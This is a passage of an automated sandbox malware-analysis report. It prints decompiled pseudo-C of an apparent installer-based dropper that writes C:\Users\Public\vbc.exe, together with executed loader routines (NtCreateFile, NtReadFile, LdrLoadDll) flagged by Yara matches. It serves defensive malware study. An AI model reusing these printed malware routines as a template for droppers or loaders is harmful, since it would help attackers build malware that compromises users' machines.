                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t16 = E00404C24(_a4, 1);
                                                                                                                                                                                                          					_t15 = 0x419;
                                                                                                                                                                                                          					goto L7;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if(_a12 != 0x20) {
                                                                                                                                                                                                          					goto L10;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				E0040431D(0x413);
                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                          			}






                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 00405317
                                                                                                                                                                                                          • CallWindowProcA.USER32(?,?,?,?), ref: 00405368
                                                                                                                                                                                                            • Part of subcall function 0040431D: SendMessageA.USER32 ref: 0040432F
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                                                                                                          • Opcode ID: 0a098fed05280c4c25b3dc975a767402e9790e492dc4fcfe2bcc4ad60f2532f9
                                                                                                                                                                                                          • Instruction ID: 61c005e653dc5e4fe91c717b668e6c159ed787b7c92b66bd7724375ff0c78d11
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a098fed05280c4c25b3dc975a767402e9790e492dc4fcfe2bcc4ad60f2532f9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5018471200608EFDF206F11DD80AAB3765EB84795F185137FE047A1D1C7BA8C629E2E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                                          			E00406134(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                          				long _t21;
                                                                                                                                                                                                          				long _t24;
                                                                                                                                                                                                          				char* _t30;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				asm("sbb eax, eax");
                                                                                                                                                                                                          				_v8 = 0x400;
                                                                                                                                                                                                          				_t21 = E004060D3(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                                                                                                                                                                                          				_t30 = _a16;
                                                                                                                                                                                                          				if(_t21 != 0) {
                                                                                                                                                                                                          					L4:
                                                                                                                                                                                                          					 *_t30 =  *_t30 & 0x00000000;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                                                                                                                                                                          					_t21 = RegCloseKey(_a20);
                                                                                                                                                                                                          					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
                                                                                                                                                                                                          					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                                                                                                                                                                          						goto L4;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return _t21;
                                                                                                                                                                                                          			}








                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,Call,0042A098,?,?,?,00000002,Call,?,004063E9,80000002), ref: 0040617A
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,004063E9,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,0042A098), ref: 00406185
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseQueryValue
                                                                                                                                                                                                          • String ID: Call
                                                                                                                                                                                                          • API String ID: 3356406503-1824292864
                                                                                                                                                                                                          • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                                                                                                                                                          • Instruction ID: abb308f8f7f3d79eba5fb0d9b58611e130e20d6dfe1a02acdbc1ca07f32112a5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA01BC72500209ABEF22CF60CD09FDB3FA8EF45364F01403AF916E6191D278C964CBA4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E004058EC(CHAR* _a4) {
                                                                                                                                                                                                          				struct _PROCESS_INFORMATION _v20;
                                                                                                                                                                                                          				int _t7;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				0x42c0c0->cb = 0x44;
                                                                                                                                                                                                          				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42c0c0,  &_v20);
                                                                                                                                                                                                          				if(_t7 != 0) {
                                                                                                                                                                                                          					CloseHandle(_v20.hThread);
                                                                                                                                                                                                          					return _v20.hProcess;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return _t7;
                                                                                                                                                                                                          			}






                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C0C0,Error launching installer), ref: 00405915
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00405922
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • Error launching installer, xrefs: 004058FF
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                          • String ID: Error launching installer
                                                                                                                                                                                                          • API String ID: 3712363035-66219284
                                                                                                                                                                                                          • Opcode ID: a7bb890bbc051f912148fc8d3d355e884b0c5c28e790f435a07fb0e3f2a9ef73
                                                                                                                                                                                                          • Instruction ID: c507ec532ebc7345b5619acd619b8ed9e71e93050b60d9e59510cdc0b01a46da
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7bb890bbc051f912148fc8d3d355e884b0c5c28e790f435a07fb0e3f2a9ef73
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52E0BFF5600209BFEB109BA5ED45F7F77ADFB04608F404525BD50F2150D77499158A78
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00405C2C(char* _a4) {
                                                                                                                                                                                                          				char* _t3;
                                                                                                                                                                                                          				char* _t5;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t5 = _a4;
                                                                                                                                                                                                          				_t3 =  &(_t5[lstrlenA(_t5)]);
                                                                                                                                                                                                          				while( *_t3 != 0x5c) {
                                                                                                                                                                                                          					_t3 = CharPrevA(_t5, _t3);
                                                                                                                                                                                                          					if(_t3 > _t5) {
                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					break;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				 *_t3 =  *_t3 & 0x00000000;
                                                                                                                                                                                                          				return  &(_t3[1]);
                                                                                                                                                                                                          			}






                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrlenA.KERNEL32(80000000,C:\Users\Public,00402F5D,C:\Users\Public,C:\Users\Public,C:\Users\Public\vbc.exe,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00405C32
                                                                                                                                                                                                          • CharPrevA.USER32(80000000,00000000), ref: 00405C40
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CharPrevlstrlen
                                                                                                                                                                                                          • String ID: C:\Users\Public
                                                                                                                                                                                                          • API String ID: 2709904686-2272764151
                                                                                                                                                                                                          • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                                                                                                                                                          • Instruction ID: 4ba3b1558e7d02da59ab85be258a456d7b40e7fb12288d653d4debc9d62610ac
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2FD0A76240CA706EF30366108C00B8F6A48DF13301F0900A6F081A2190C3BC4C424BFD
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E72E310E0(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                                                                          				char* _t17;
                                                                                                                                                                                                          				char _t19;
                                                                                                                                                                                                          				void* _t20;
                                                                                                                                                                                                          				void* _t24;
                                                                                                                                                                                                          				void* _t27;
                                                                                                                                                                                                          				void* _t31;
                                                                                                                                                                                                          				void* _t37;
                                                                                                                                                                                                          				void* _t39;
                                                                                                                                                                                                          				void* _t40;
                                                                                                                                                                                                          				signed int _t43;
                                                                                                                                                                                                          				void* _t52;
                                                                                                                                                                                                          				char* _t53;
                                                                                                                                                                                                          				char* _t55;
                                                                                                                                                                                                          				void* _t56;
                                                                                                                                                                                                          				void* _t58;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				 *0x72e3405c = _a8;
                                                                                                                                                                                                          				 *0x72e34060 = _a16;
                                                                                                                                                                                                          				 *0x72e34064 = _a12;
                                                                                                                                                                                                          				 *((intOrPtr*)(_a20 + 0xc))( *0x72e34038, E72E31556, _t52);
                                                                                                                                                                                                          				_t43 =  *0x72e3405c +  *0x72e3405c * 4 << 2;
                                                                                                                                                                                                          				_t17 = E72E3123B();
                                                                                                                                                                                                          				_a8 = _t17;
                                                                                                                                                                                                          				_t53 = _t17;
                                                                                                                                                                                                          				if( *_t17 == 0) {
                                                                                                                                                                                                          					L16:
                                                                                                                                                                                                          					return GlobalFree(_a8);
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					do {
                                                                                                                                                                                                          						_t19 =  *_t53;
                                                                                                                                                                                                          						_t55 = _t53 + 1;
                                                                                                                                                                                                          						_t58 = _t19 - 0x6c;
                                                                                                                                                                                                          						if(_t58 > 0) {
                                                                                                                                                                                                          							_t20 = _t19 - 0x70;
                                                                                                                                                                                                          							if(_t20 == 0) {
                                                                                                                                                                                                          								L12:
                                                                                                                                                                                                          								_t53 = _t55 + 1;
                                                                                                                                                                                                          								_t24 = E72E31266(E72E312AD( *_t55 - 0x30));
                                                                                                                                                                                                          								L13:
                                                                                                                                                                                                          								GlobalFree(_t24);
                                                                                                                                                                                                          								goto L14;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t27 = _t20;
                                                                                                                                                                                                          							if(_t27 == 0) {
                                                                                                                                                                                                          								L10:
                                                                                                                                                                                                          								_t53 = _t55 + 1;
                                                                                                                                                                                                          								_t24 = E72E312D1( *_t55 - 0x30, E72E3123B());
                                                                                                                                                                                                          								goto L13;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							L7:
                                                                                                                                                                                                          							if(_t27 == 1) {
                                                                                                                                                                                                          								_t31 = GlobalAlloc(0x40, _t43 + 4);
                                                                                                                                                                                                          								 *_t31 =  *0x72e34030;
                                                                                                                                                                                                          								 *0x72e34030 = _t31;
                                                                                                                                                                                                          								E72E31508(_t31 + 4,  *0x72e34064, _t43);
                                                                                                                                                                                                          								_t56 = _t56 + 0xc;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							goto L14;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						if(_t58 == 0) {
                                                                                                                                                                                                          							L17:
                                                                                                                                                                                                          							_t34 =  *0x72e34030;
                                                                                                                                                                                                          							if( *0x72e34030 != 0) {
                                                                                                                                                                                                          								E72E31508( *0x72e34064, _t34 + 4, _t43);
                                                                                                                                                                                                          								_t37 =  *0x72e34030;
                                                                                                                                                                                                          								_t56 = _t56 + 0xc;
                                                                                                                                                                                                          								GlobalFree(_t37);
                                                                                                                                                                                                          								 *0x72e34030 =  *_t37;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							goto L14;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t39 = _t19 - 0x4c;
                                                                                                                                                                                                          						if(_t39 == 0) {
                                                                                                                                                                                                          							goto L17;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t40 = _t39 - 4;
                                                                                                                                                                                                          						if(_t40 == 0) {
                                                                                                                                                                                                          							 *_t55 =  *_t55 + 0xa;
                                                                                                                                                                                                          							goto L12;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t27 = _t40;
                                                                                                                                                                                                          						if(_t27 == 0) {
                                                                                                                                                                                                          							 *_t55 =  *_t55 + 0xa;
                                                                                                                                                                                                          							goto L10;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						goto L7;
                                                                                                                                                                                                          						L14:
                                                                                                                                                                                                          					} while ( *_t53 != 0);
                                                                                                                                                                                                          					goto L16;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}



















                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 72E3115B
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 72E311B4
                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 72E311C7
                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 72E311F5
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2167878164.0000000072E31000.00000020.00020000.sdmp, Offset: 72E30000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167873253.0000000072E30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167884351.0000000072E33000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167889901.0000000072E35000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1780285237-0
                                                                                                                                                                                                          • Opcode ID: 39cd5347c46523c77e613e363a985759f6f433a6b0dc7bb7a9f8d0ea5fa53a9a
                                                                                                                                                                                                          • Instruction ID: 053ede8782feb740b2b03d6bab88ab1d7692ee0d699493ab0abcb8cad182cd18
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39cd5347c46523c77e613e363a985759f6f433a6b0dc7bb7a9f8d0ea5fa53a9a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6331BCB6604208AFD7028F6DD948B6D7FFCFB05247BA4A95DE846CA212D7348880CF61
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00405D4B(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                          				int _t12;
                                                                                                                                                                                                          				int _t14;
                                                                                                                                                                                                          				int _t15;
                                                                                                                                                                                                          				CHAR* _t17;
                                                                                                                                                                                                          				CHAR* _t27;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t12 = lstrlenA(_a8);
                                                                                                                                                                                                          				_t27 = _a4;
                                                                                                                                                                                                          				_v8 = _t12;
                                                                                                                                                                                                          				while(lstrlenA(_t27) >= _v8) {
                                                                                                                                                                                                          					_t14 = _v8;
                                                                                                                                                                                                          					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                                                                                                                                                                          					_t15 = lstrcmpiA(_t27, _a8);
                                                                                                                                                                                                          					_t27[_v8] =  *(_t14 + _t27);
                                                                                                                                                                                                          					if(_t15 == 0) {
                                                                                                                                                                                                          						_t17 = _t27;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t27 = CharNextA(_t27);
                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					L5:
                                                                                                                                                                                                          					return _t17;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t17 = 0;
                                                                                                                                                                                                          				goto L5;
                                                                                                                                                                                                          			}










                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5B
                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D73
                                                                                                                                                                                                          • CharNextA.USER32(00000000), ref: 00405D84
                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 190613189-0
                                                                                                                                                                                                          • Opcode ID: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
                                                                                                                                                                                                          • Instruction ID: 0c063e539c4a2d6313fdce3eb9328f18231664df77b923cface8765f2046746d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0AF0F632104914FFCB02DFA4DD04D9FBBA8EF46350B2580BAE840F7220D634DE019BA9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                          C-Code - Quality: 37%
                                                                                                                                                                                                          			E00418270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                                                                                                                                          				void* _t18;
                                                                                                                                                                                                          				void* _t27;
                                                                                                                                                                                                          				intOrPtr* _t28;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t13 = _a4;
                                                                                                                                                                                                          				_t28 = _a4 + 0xc48;
                                                                                                                                                                                                          				E00418DC0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                                                                                                                                                          				_t6 =  &_a32; // 0x413d52
                                                                                                                                                                                                          				_t12 =  &_a8; // 0x413d52
                                                                                                                                                                                                          				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                                                                                                                                                                                          				return _t18;
                                                                                                                                                                                                          			}







                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                                          • String ID: R=A$R=A
                                                                                                                                                                                                          • API String ID: 2738559852-3742021989
                                                                                                                                                                                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                                                                          • Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 35%
                                                                                                                                                                                                          			E0041817A(void* __ebx, long __ecx, void* __edx, void* _a1, intOrPtr _a4, intOrPtr _a8, HANDLE* _a12, long _a16, struct _EXCEPTION_RECORD _a20, struct _ERESOURCE_LITE _a24, struct _GUID _a28, long _a32, long _a36, long _a40) {
                                                                                                                                                                                                          				signed char _t20;
                                                                                                                                                                                                          				long _t25;
                                                                                                                                                                                                          				void* _t45;
                                                                                                                                                                                                          				void* _t46;
                                                                                                                                                                                                          				intOrPtr* _t48;
                                                                                                                                                                                                          				long _t50;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				asm("stc");
                                                                                                                                                                                                          				if(__ecx >=  *((intOrPtr*)(__edx + 0x53))) {
                                                                                                                                                                                                          					 *(__ebx - 0x3b7cd3b3) =  *(__ebx - 0x3b7cd3b3) ^ __ecx;
                                                                                                                                                                                                          					asm("adc al, 0x52");
                                                                                                                                                                                                          					_t25 = NtCreateFile(_a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, __ecx, _t20 ^ 0x0000008b, _t50); // executed
                                                                                                                                                                                                          					return _t25;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t26 = _a4;
                                                                                                                                                                                                          					_t4 = _t26 + 0xc3c; // 0xc64
                                                                                                                                                                                                          					_t48 = _t4;
                                                                                                                                                                                                          					E00418DC0(_t45, _a4, _t48,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x27);
                                                                                                                                                                                                          					return  *((intOrPtr*)( *_t48))(_a8, _a12, _a16, _a20, _a24, _t46, _t50);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}










                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                          • Opcode ID: 84ab12f38130ba6374c4d5e4bd2e4226f3d05ceb612b97be0999a57cad77d801
                                                                                                                                                                                                          • Instruction ID: 89afb2f1cf6171b8558e0c7e0ca09a0a510f862957134e4a4b828be0d8d9e918
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 84ab12f38130ba6374c4d5e4bd2e4226f3d05ceb612b97be0999a57cad77d801
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF11E2B2204209BBCB08CF98DC84DEB77ADAF8C754B15864DFA5D97241CA30E8518BA4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00409B20(void* __eflags, void* _a4, intOrPtr _a8) {
                                                                                                                                                                                                          				char* _v8;
                                                                                                                                                                                                          				struct _EXCEPTION_RECORD _v12;
                                                                                                                                                                                                          				struct _OBJDIR_INFORMATION _v16;
                                                                                                                                                                                                          				char _v536;
                                                                                                                                                                                                          				void* _t15;
                                                                                                                                                                                                          				struct _OBJDIR_INFORMATION _t17;
                                                                                                                                                                                                          				struct _OBJDIR_INFORMATION _t18;
                                                                                                                                                                                                          				void* _t30;
                                                                                                                                                                                                          				void* _t31;
                                                                                                                                                                                                          				void* _t32;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t24 = _a8;
                                                                                                                                                                                                          				_v8 =  &_v536;
                                                                                                                                                                                                          				_t15 = E0041AB50( &_v12, 0x104, _a8);
                                                                                                                                                                                                          				_t31 = _t30 + 0xc;
                                                                                                                                                                                                          				if(_t15 != 0) {
                                                                                                                                                                                                          					_t17 = E0041AF70(_v8, _t24, __eflags, _v8);
                                                                                                                                                                                                          					_t32 = _t31 + 4;
                                                                                                                                                                                                          					__eflags = _t17;
                                                                                                                                                                                                          					if(__eflags != 0) {
                                                                                                                                                                                                          						E0041B1F0(__eflags,  &_v12, 0);
                                                                                                                                                                                                          						_t32 = _t32 + 8;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t18 = E00419300(_v8);
                                                                                                                                                                                                          					_v16 = _t18;
                                                                                                                                                                                                          					__eflags = _t18;
                                                                                                                                                                                                          					if(_t18 == 0) {
                                                                                                                                                                                                          						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                                                                                                                                                          						return _v16;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					return _t18;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					return _t15;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}














                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Load
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2234796835-0
                                                                                                                                                                                                          • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                                                                          • Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                                                          			E004181C0(void* __ebx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, void* _a48) {
                                                                                                                                                                                                          				void* _v3;
                                                                                                                                                                                                          				intOrPtr _t15;
                                                                                                                                                                                                          				signed char _t16;
                                                                                                                                                                                                          				long _t21;
                                                                                                                                                                                                          				long _t23;
                                                                                                                                                                                                          				void* _t31;
                                                                                                                                                                                                          				long _t33;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t15 = _a4;
                                                                                                                                                                                                          				_t23 =  *(_t15 + 0x10);
                                                                                                                                                                                                          				_t3 = _t15 + 0xc40; // 0xc40
                                                                                                                                                                                                          				_t16 = E00418DC0(_t31, _t15, _t3, _t23, 0, 0x28);
                                                                                                                                                                                                          				 *(__ebx - 0x3b7cd3b3) =  *(__ebx - 0x3b7cd3b3) ^ _t23;
                                                                                                                                                                                                          				asm("adc al, 0x52");
                                                                                                                                                                                                          				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _t23, _t16 ^ 0x0000008b, _t33); // executed
                                                                                                                                                                                                          				return _t21;
